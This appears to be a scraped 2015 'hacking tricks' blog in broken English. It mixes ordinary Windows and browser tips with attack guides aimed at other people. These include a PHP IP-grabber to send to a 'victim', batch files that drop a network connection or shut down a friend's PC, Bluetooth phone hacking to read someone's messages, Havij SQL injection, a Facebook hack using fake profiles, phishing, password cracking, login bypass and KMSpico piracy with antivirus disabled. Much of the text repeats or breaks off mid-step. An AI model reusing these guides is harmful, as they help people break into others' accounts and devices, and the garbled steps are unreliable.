Here's an excellent shortcut key for you like: Win+X. It brings up links
to the event viewer, device manager, prompt, and more. bear in mind that
shortcut: Win+X.move down the Windows 8 approach needs variety of steps:
Open the Charms Bar then click Settings (or hit Win+I), then the
ability button, and choose if you would.
Frnds my name is Baru.I wanna give you best trick and tips from prefect hacker's post.it s all tips for only educational base not for crime.if any problem about it so plz comment......... .
More
Tuesday, 31 March 2015
Mobile Phone Hacking Software
Here some useful Bluetooth hacking software for you.downloade and enjoy
1. Super Bluetooth Hack 1.08
This software is used for controlling and reading information from remote phone via bluetooth or infra. Phone
list and SMS can be stored in HTML format. In addition to it, it will display information about battery, network and sim card.
2. Blue Scanner
1. Super Bluetooth Hack 1.08
This software is used for controlling and reading information from remote phone via bluetooth or infra. Phone
list and SMS can be stored in HTML format. In addition to it, it will display information about battery, network and sim card.
2. Blue Scanner
How to Recover deleted photos from iPhone
If you lost photos from your iPhone 6, iPhone 6 Plus or any other iPhone running in iOS 8,
the Photos app now features a Trash can (Recycle Bin) where your
deleted photos reside. If you accidentally delete a photo and want to
recover it, please follow the instruction below.
- Open your Photos app.
how to delete your blog:
- If you want to delete your blog.this is very easy step to delete blog from blogger.com
- Sign in to blogger.com.
- Next to the blog you want to delete, select Settings from the drop-down..
- Select Settings.
- Under “Settings” on the left side of the page, click Other.
- Go to "Blog tools."
- Optional Click Export blog to save a copy on your hard drive.
- Click Delete this blog.
how to hack iphone password
If you want to hack iphone password.or wanted to unlock an iPhone when you did not know the passcode.. This trick tells you how to hack an iPhone's password. This will open the
contacts app from which you will be able to browse, edit, email any
contact.
How To Disable Facebook Timeline
Hi friends i am going to show you that how can you remove or disable facebook timeline and backup your old profile look . if you have activated facebook timeline and now you want to remove facebook timeline and get old profile back then just follow the give below steps for do this
Mobile Phone Hacking
Hello friends, in this article I will show you how to hack mobile phone with simple software called Super Bluetooth Hack v. 1.08 . Once connected to a another phone via bluetooth you can do the following:
1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
how to secure wi-fi
here very easy tips for you .if some one using your internet ,you want to stop them
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
How To Get Hidden Email On Facebook
Hello To All friends Today i am going to show you how can you get hidden email ids of your all facebook friends.
Just follow the given steps for do this.
Monday, 30 March 2015
How to Hack Friends ComPuter Using Pendrive
Yes we can hack friend computer by pendrive.no need to any software.open your notepad.
copy this code into notepad:
@echo off
shutdown -s -t 00
Save as abc.bat extension .Now open the notepad and copy this code:
copy this code into notepad:
@echo off
shutdown -s -t 00
Save as abc.bat extension .Now open the notepad and copy this code:
How to Disable Autorun in Windows 7
Here we will learn how to disable Autorun. Step 1. Press Windows key + R to launch the Run dialogue box. Here you need to enter Gpedit.msc and then click on OK.
Step 2. You will now see the Local Group Policy Editor on your screen.
Step 2. You will now see the Local Group Policy Editor on your screen.
How To Protect Gmail From Hackers?
Hi frnds your mail will be the backbone of almost all other accounts like facebook, twitter, etc. So it's very important to protect our mail.
This is a gmail new security technique. You can secure your gmail from these hackers by using the following tips.
Login to your gmail account .and go to Acount
Click On Account after signing in
In your Account Go to Security option
In Security you see whether 2 step verification is OFF if then turn ON that option for that you should click on edit
Now It shows as given below. In that click on Start Setup .Now enter your mobile number and click on Send Code
A code will be received in your phone as a text message. Enter the code in the sapce provided and click on Verify
After verifying you can set a default device means we can login from that device without any code. if you need to login from other devices a code is send to your phone. You can login only after entering the code only. If your phone is lost you can change the number from your gmail account by signing in from the default device.
enjoy
This is a gmail new security technique. You can secure your gmail from these hackers by using the following tips.
Login to your gmail account .and go to Acount
Click On Account after signing in
In your Account Go to Security option
In Security you see whether 2 step verification is OFF if then turn ON that option for that you should click on edit
Now It shows as given below. In that click on Start Setup .Now enter your mobile number and click on Send Code
A code will be received in your phone as a text message. Enter the code in the sapce provided and click on Verify
After verifying you can set a default device means we can login from that device without any code. if you need to login from other devices a code is send to your phone. You can login only after entering the code only. If your phone is lost you can change the number from your gmail account by signing in from the default device.
enjoy
Monday, 23 March 2015
How To Hack Someone Ip Address
This is easy ip grabing.here we will learn how we can get victim password by .php
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
This is ip graber teach.we will grab pass by phpCopy the below codes into notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
View saved password in google chrome
- Open Google Chrome
- Go to Settings (Its on the Right Corner)
- Then Click on Advance Settings
- Scroll Down and their will be password and forms from their click on Manage saved password.
- Then list of all websites whose passwords are saved on browser will be listed.
- Click on show to view those passwords
- Enjoy!!
view login password in Google chrome
This funny trick you feel good after watch it 's magic.we are going to use it in google chrome.
Open Facebook where password is saved by user. it will work on any website.
right click on password as shown in below image.
Then change password to text as shown in below picture.
Before changing it will look like below:
Before changing it will look like below:
Done now dots will changed to text.
How To Watch 18+ Youtube Videos Without Logging In
this is very easy trick you can watch any video without singin.
we will learn it step by step
First get the Url of video you want to watch. As shown below.
Now paste the Video Id in the link given below.
we will learn it step by step
First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqkThen copy the Video Id. For above link video Id is 4Xkh6j7RMqk
Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
- Replace VideoId with the Id you copied in Step 2
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1Done.
IDM OPTIMIZER
- IDM optimizer is use for speedup internetdownlode manager.
- Download IDM Optimizer Tool
how to unblock any website
Here i wanna to give a link for unblocking any website.if facebook and other website block in your school and office do not worry you can open these all type website any where.this link for you frnds
Custom Power Switch:windows7
By default you see the "ShutDown" button on start button. But you are the man who reboots your pc several times a day then you can change "ShutDown" to "ReStart" in a few click by fallowing this simple steps.
1: Right - Click on Start button.
2: Choose Properties and set the 'Power boot action' to 'Restart' to make it happen.
That's it your done!!
enjoy
Block a website windows7/8
here a trick for you how can we block a website windows7/8.no need any software.welearn here step by step-
Blocking a site using these steps only blocks the website on one computer. Any other computer, phone, or tablet connected to your computer will be able to access the site you're blocking.
The new versions of Windows include a new Windows Family Safety feature that allows parents to setup computer usage rules and includes the ability to only allow certain websites or block websites. If you're running Windows 7 or Windows 8, open Family Safety from either the Windows Start Menu or Start Screen by typing "family" and then clicking on the Family Safety shortcut that should appear.
Havij
Havij is a power full tool.hare we can learn how we can hack any website by havij.1: Find SQL injection Vulnerability in tour site and insert the string (likehttp://www.target.com/index.asp?id=123) of it in Havij as show below.
Step3: Now click on the Analyse button as shown below.
Common Methods used for Website Hacking
There are lots of methods that can be used to hack a website but most common ones are as follows:
1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack
1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack
how to block website
Here we are block website without any softwaer.first of all you have to reach to “hosts” file by following the address >>C:\Windows\System32\drivers\etc. Remember that this address is for Windows 7. Now right click on “hosts” and select Properties.
open banned website
This trick is very easy with it's help we can open any banned website. Open www.incloak.com in your browser.
You can also use any proxy site from list below
You can also use any proxy site from list below
Top 10 Free Software for Mac OS X
It s good softwaer for your mac.i hope you like all softwaer.These free software installed in your Mac, you’ll never need to wish for
any good softwares. The benefit of these software is that, it’s open
source. Web Browsing:
For web browsing puropose, we have the most popular browser,
Mozilla Firefox. Mozilla Firefox is open-source browser that supports
tabbed browsing, pop-up blocking, themes, and extensions. Considered by
many to be the world’s best browser. This is equally popular in Windows
based OS. Download it from here
how to hack facebook account
I am going to teach you Hacking Facebook account passwords stepby step:
1. Victim (whose Facebook account password you wanna hack) should be on Facebook.
2. Create four to five fake Facebook accounts(three are
sufficient but one more for bonus). I will advice you that create
accounts with girl names and put an awesome girls photograph. Fill the
basic profile.. Why i am saying create account with Girl names is just
because Hungry boys accepts girls friend request without any delay. And
if you know the person personally then create account with names of his
near ones and say that you have created new profile so add
How To Crack Windows 7 Password Using Ophcrack
Here we are going to crack windows7password crack by ophcracker.first we download live image and burn the live image of ophcrack.
- 1. Download Opcrack Live Cd by Clicking Here.
- 2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
uninstalle programs by right click
If you want to uninstall any programs in your windows.no need to go to control panel downloade uninstaller and right click on program click on uninstall
Downloade
Downloade
how to convert your webpage in pdf file by Google chrome
This very funny tricks for new chrome user.you can use this trick on Google Chrome.
Sunday, 22 March 2015
reset mozila master password
If you forgot your Mozilla master password do not worry.you can easy reset your master password.Warning: Resetting your master password will remove all of your saved usernames and passwords.
- In the Firefox location bar, enter the following location:
chrome://pippki/content/resetpassword.xul
- Press Enter.
- The "Reset Master Password" page will appear. Click the Reset button, to reset your master password.
Friday, 20 March 2015
Monday, 16 March 2015
Bypass SMS verification any website
This method is very useful to Bypass SMS verification and useful when you need to Sign up any account and do not feel comfortable to giving your real number or if you want to create multiple account.
Lets Start Step by Step:
1) First go to this Website : Receive-Sms Online
2) Copy any one number and paste it where they are asking SMS Verification.
3) Simply come back and click the number which you have selected, check it out there is your code sent by google, youtube or whatever else.enjoy
Import file over a network to Windows Live MovieMaker:windows7
In windows 7 by default Windows Live MovieMaker will not give you access to import files over a network, but a simple Registry tweak will make this happen. Just follow this steps.
1: Run REGEDIT
2: Now navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows Live\Movie Maker,
3: Now add a DWORD value called AllowNetworkFiles and set it to 1 to add network support.
That's it your done.
Find out Hidden wallpapers and themes:windows7
We all knew that while windows 7 is been installed it will ask for your country, Time Zone etc.., Now based on your responses
Wednesday, 11 March 2015
Hack windows XP/2000and2003 password
When you want to hack victim password.start system and when you see Windows login screen, press ctrl+alt+Del
keys twice and it'll show login box. Now type Administrator in user
name and leave password field blank. Then press Enter and you will be
able to log in Windows. Now you can reset your account password from
Control Panel =User accounts.it only work on user password hack not for admin.
hack windowsXP password with XP's cd
- THIS the easy way to reset your windows xp password
- . Boot using Windows XP Setup CD and follow the instructions.
RESET PATTERAN LOCK ANDROID
If you forget your android p. lock first remove the battery
Replace the battery but do not power the device on.
Replace the battery but do not power the device on.
Downloade windows 7,8,10and 2008 activator
we can activate any windows with kmspico.it very easy first stop windows defender services and antivirus.install KMSpico and click 1 2 and 3 button same as pic
downloade
downloade
how to get fast internet speed in windows8
Here we are going to speed up our internet .how ?try it and chach your speed.log on to Windows 8 computer with the account that has the elevated privileges.
Click Desktop tile from the Start screen to go to the desktop window.
Once on the desktop screen, hover the mouse to the bottom right corner of the window.
From the displayed options, click Search.
Click Desktop tile from the Start screen to go to the desktop window.
Once on the desktop screen, hover the mouse to the bottom right corner of the window.
From the displayed options, click Search.
Tuesday, 10 March 2015
How to open a Telnet session on Windows 7 or Windows 8 OS
Telnet is a protocol that enables you to
connect to remote computers and local computers over a TCP/IP network,
over TCP port 23. By default, Telnet is disabled in recent Windows
environments.
To enable Telnet command line utilities:
To enable Telnet command line utilities:
- Click Start > Control Panel.
- Click Programs and Features.
- Click Turn Windows features on or off.
- In the Windows Features dialog box, check the Telnet Client check box.
- Click OK. The system installs the appropriate files. This will take a few seconds to a minute.
- Click Start.
- Enter cmd in the Search field in the Start menu. A command prompt is displayed.
- Type telnet and press ENTER. The Telnet> prompt is displayed.
- you can watch more...... telnet video
Tor browser
Tor does not protect all of your computer's Internet traffic when you
run it. Tor only protects your applications that are properly configured to
send their Internet traffic through Tor. To avoid problems with Tor
configuration, we strongly recommend you use the
Tor Browser. It is pre-configured to protect
your privacy and anonymity on the web as long as you're browsing with the Tor
Browser itself. Almost any other web browser configuration is likely to be
unsafe to use with Tor.
Monday, 9 March 2015
Flashing BIOS via hardware
If you can’t access the computer when it’s
on, and the standard backdoor passwords didn’t work, you’ll have to
flash the BIOS via hardware. Please read the important notes at the end
of this section before to try any of these methods.
Instantly Boost Internet Connection
Instantly Boost Internet Connection
These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP ( and Vista ).Open your registry and find the key below.
Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on ‘Edit -> New -> DWORD Value’ and then set the value as shown below.
DefaultTTL = “80” hex (or 128 decimal)
Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.
EnablePMTUBHDetect = “0”
Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.
EnablePMTUDiscovery = “1”
Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.
GlobalMaxTcpWindowSize = “7FFF” hex (or 32767 decimal)
Specifies the system maximum receive window size advertised by the TCP/IP stack.
TcpMaxDupAcks = “2”
Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before “fast retransmit” is triggered.
SackOpts = “1”
Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.
Tcp1323Opts = “1”
Controls RFC 1323 time stamps and window scaling options. Possible values are: “0” = disable RFC 1323 options, “1” = window scale enabled only, “2” = time stamps enabled only and “3” = both options enabled.
TcpWindowSize = “7FFF” hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.
Exit your registry and restart Windows for the changes to take effect.
If you don’t want to edit the registry, here are little TCP utilities. Either is ideal.
Dr.PING
http://www.broadbandreports.com/front/doctorping.zip
Dr.TCP
http://www.dslreports.com/drtcp
Facebook fishing hack
Here Basic Concept of Phishing:-
Recently i posted a Tutorial on how to do Tab napping (learn here) and discussed there the use of phishing pages. So, i am demonstrating that how phishing is done to aware you all. I will show you a facebook phishing page and the method on how to make such page.
Recently i posted a Tutorial on how to do Tab napping (learn here) and discussed there the use of phishing pages. So, i am demonstrating that how phishing is done to aware you all. I will show you a facebook phishing page and the method on how to make such page.
Fairfox addon secur
Quick Translator by igv
The most lightweight and easiest translator. Translate between more than 80 languages with one click or a hot key. Translate from one word to a whole page.
FoxyProxy Standard by Eric H. Jung, groeg, others
FoxyProxy is an advanced proxy management tool that completely replaces Firefox's limited proxying capabilities. For a simpler tool and less advanced configuration options, please use FoxyProxy Basic.
Firefox Penetration Testing Tool
18 Extensions For Turning Firefox Into a Penetration Testing Tool.Pen Testing Boot Camp
The industry's most comprehensive pen-testing course!Click Here!SkillsetFirefox is a popular web browser from Mozilla. Popularity of Firefox is not only because it’s a good web browser,
Labels:
Attacks types
Attacks types
Here we learn Type of attacks
Malware
Simply defined, malware is any computer code that has a malicious intent. Malware is often used to destroy something on a computer or to steal private information. Odds are, nearly everyone with a computer has fallen victim to some form of malware in their time.
Malware
Simply defined, malware is any computer code that has a malicious intent. Malware is often used to destroy something on a computer or to steal private information. Odds are, nearly everyone with a computer has fallen victim to some form of malware in their time.
Make your own website free
https://www.zoho.com/sites/signin.html?serviceurl=%2Fbuilder%3FsiteId%3D49254050&rdn=sites.zoho.com
copy it and past on your browser
copy it and past on your browser
Tuesday, 3 March 2015
Facebook security
As a internet user how can we defend our self, I am going to inform
you people about a Facebook feature which not so many people know
about.
Labels:
Google Talk login
Subscribe to:
Posts (Atom)